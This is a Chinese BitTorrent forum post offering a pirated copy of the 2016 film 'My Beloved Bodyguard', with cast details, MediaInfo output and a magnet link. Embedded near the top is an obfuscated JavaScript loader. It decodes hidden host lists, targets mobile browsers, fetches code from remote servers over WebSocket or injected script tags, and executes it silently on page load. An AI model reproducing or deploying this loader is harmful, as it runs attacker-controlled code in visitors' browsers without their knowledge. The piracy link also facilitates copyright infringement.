我的特工爷爷[国粤语配音/中文字幕].My.Beloved.Bodyguard.2016.1080p.BluRay.x265.10bit.DTS.2Audio 6.44GB

版主小s 5天前 97

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译 名 我的特工爷爷 / 老卫兵 / My Beloved Bodyguard

◎片 名 特工爺爺

◎年 代 2016

◎产 地 中国香港 / 中国大陆

◎类 别 剧情 / 动作 / 冒险

◎语 言 汉语普通话 / 粤语

◎上映日期 2016-04-01(中国大陆/中国香港)

◎IMDb链接 https://www.imdb.com/title/tt4076934/

◎豆瓣评分 5.5/10 (62194人评价)

◎豆瓣链接 https://movie.douban.com/subject/25945280/

◎片 长 97分钟

◎导 演 洪金宝 Sammo Hung Kam-Bo (id:1055887)

◎编 剧 江均 Jun Jiang (id:1349862)

◎演 员 洪金宝 Sammo Hung Kam-Bo (id:1055887)

刘德华 Andy Lau (id:1054424)

朱雨辰 Yuchen Zhu (id:1274391)

李勤勤 Qinqin Li (id:1274639)

冯嘉怡 Jiayi Feng (id:1317068)

陈沛妍 Jacqueline Chan (id:1336686)

胡军 Jun Hu (id:1032540)

冯绍峰 Shaofeng Feng (id:1275721)

彭于晏 Eddie Peng (id:1013782)

宋佳 Jia Song (id:1042341)

徐克 Hark Tsui (id:1007152)

麦嘉 Karl Maka (id:1274986)

石天 Dean Shek (id:1146001)

元彪 Biao Yuen (id:1163752)

元秋 Qiu Yuen (id:1304876)

元华 Wah Yuen (id:1050240)

吴明才 Ming-tsai Wu (id:1315560)

元宝 Bo Yuen (id:1346065)

盖吉利 James Lee Guy (id:1323916)

托马尔·奥兹 Tomer Oz (id:1343008)

张林 Lin Zhang (id:1383489)

华栖龙 Sergio Deieso (id:1364611)

林克明 Ke Ming Lin (id:1360416)

郑思杰 Clement Sze-Kit Cheng (id:1069257)

江志强 William Kong (id:1288870)

陈佩华 Jessica Chan Pooi-Wa (id:1372898)

张镒麟 Yilin Zhang (id:1402439)

林国华 Ardy Lam (id:1289296)

卢炜麟 Alan Lo (id:1372368)

林克明 Ke Ming Lin (id:1360416)

罗礼贤 Bruce Law (id:1289542)

叶圣涛 Shengtao Ye (id:1364994)

时尚 Shang Shi (id:1356202)

罗义民 Norman Law (id:1316462)

◎标 签 动作 / 香港 / 温情 / 亲情 / 2016 / 剧情 / 中国大陆 / 喜剧

◎简 介

退休军官老丁(洪金宝 饰)因“健忘症”弄丢孙女,内疚回到老家。邻居小女孩春花(陈沛妍 饰)成为他的慰藉。可女孩的父亲(刘德华 饰)无意卷入了当地黑帮团伙的争斗中。老丁为营救春花挺身而出,也寻回那份作为军人的骄傲和弥补作为爷爷的过错。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 256298861341733115167194878496723152514 (0xC0D15D7C3E124D7E0DB7640F4CA7AE82)

  4. Complete name : My.[email protected]BBQDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 6.44 GiB

  8. Duration : 1 h 38 min

  9. Overall bit rate : 9 331 kb/s

  10. Movie name : The Bodyguard

  11. Encoded date : UTC 2021-10-12 03:00:12

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover : Yes

  15. Attachments : cover.jpg


  16. Video

  17. ID : 1

  18. Format : HEVC

  19. Format/Info : High Efficiency Video Coding

  20. Format profile : Main [email protected]@Main

  21. Codec ID : V_MPEGH/ISO/HEVC

  22. Duration : 1 h 38 min

  23. Bit rate : 6 288 kb/s

  24. Width : 1 920 pixels

  25. Height : 804 pixels

  26. Display aspect ratio : 2.40:1

  27. Frame rate mode : Constant

  28. Frame rate : 24.000 FPS

  29. Color space : YUV

  30. Chroma subsampling : 4:2:0

  31. Bit depth : 10 bits

  32. Bits/(Pixel*Frame) : 0.170

  33. Stream size : 4.34 GiB (67%)

  34. Writing library : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings : rc=crf / crf=17.5000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x804 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default : Yes

  37. Forced : No


  38. Audio #1

  39. ID : 2

  40. Format : DTS

  41. Format/Info : Digital Theater Systems

  42. Codec ID : A_DTS

  43. Duration : 1 h 38 min

  44. Bit rate mode : Constant

  45. Bit rate : 1 510 kb/s

  46. Channel(s) : 6 channels

  47. Channel layout : C L R Ls Rs LFE

  48. Sampling rate : 48.0 kHz

  49. Frame rate : 93.750 FPS (512 SPF)

  50. Bit depth : 24 bits

  51. Compression mode : Lossy

  52. Stream size : 1.04 GiB (16%)

  53. Title : Mandarin

  54. Language : Chinese

  55. Default : Yes

  56. Forced : No


  57. Audio #2

  58. ID : 3

  59. Format : DTS

  60. Format/Info : Digital Theater Systems

  61. Codec ID : A_DTS

  62. Duration : 1 h 38 min

  63. Bit rate mode : Constant

  64. Bit rate : 1 510 kb/s

  65. Channel(s) : 6 channels

  66. Channel layout : C L R Ls Rs LFE

  67. Sampling rate : 48.0 kHz

  68. Frame rate : 93.750 FPS (512 SPF)

  69. Bit depth : 24 bits

  70. Compression mode : Lossy

  71. Stream size : 1.04 GiB (16%)

  72. Title : Cantonese

  73. Language : Chinese

  74. Default : No

  75. Forced : No


  76. Text #1

  77. ID : 4

  78. ID in the original source medium : 4609 (0x1201)

  79. Format : PGS

  80. Muxing mode : zlib

  81. Codec ID : S_HDMV/PGS

  82. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  83. Duration : 1 h 29 min

  84. Bit rate : 14.0 kb/s

  85. Count of elements : 1485

  86. Stream size : 8.94 MiB (0%)

  87. Title : chs

  88. Language : Chinese

  89. Default : Yes

  90. Forced : No

  91. Original source medium : Blu-ray


  92. Text #2

  93. ID : 5

  94. ID in the original source medium : 4610 (0x1202)

  95. Format : PGS

  96. Muxing mode : zlib

  97. Codec ID : S_HDMV/PGS

  98. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  99. Duration : 1 h 29 min

  100. Bit rate : 14.2 kb/s

  101. Count of elements : 1485

  102. Stream size : 9.09 MiB (0%)

  103. Title : cht

  104. Language : Chinese

  105. Default : No

  106. Forced : No

  107. Original source medium : Blu-ray


  108. Text #3

  109. ID : 6

  110. ID in the original source medium : 4608 (0x1200)

  111. Format : PGS

  112. Muxing mode : zlib

  113. Codec ID : S_HDMV/PGS

  114. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  115. Duration : 1 h 29 min

  116. Bit rate : 16.5 kb/s

  117. Count of elements : 1547

  118. Stream size : 10.6 MiB (0%)

  119. Title : eng

  120. Language : English

  121. Default : No

  122. Forced : No

  123. Original source medium : Blu-ray


  124. Menu

  125. 00:00:00.000 : en:第 01 章

  126. 00:08:47.208 : en:第 02 章

  127. 00:17:02.875 : en:第 03 章

  128. 00:26:29.083 : en:第 04 章

  129. 00:34:17.791 : en:第 05 章

  130. 00:41:42.791 : en:第 06 章

  131. 00:52:29.208 : en:第 07 章

  132. 00:58:20.541 : en:第 08 章

  133. 01:06:31.166 : en:第 09 章

  134. 01:15:40.125 : en:第 10 章

  135. 01:20:48.625 : en:第 11 章

  136. 01:28:41.166 : en:第 12 章


TAGS 动作 冒险 剧情

磁力链:
  • magnet:?xt=urn:btih:7C6DFA1CED7EA9AF79843E516F35F37C1AFBCD6D
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖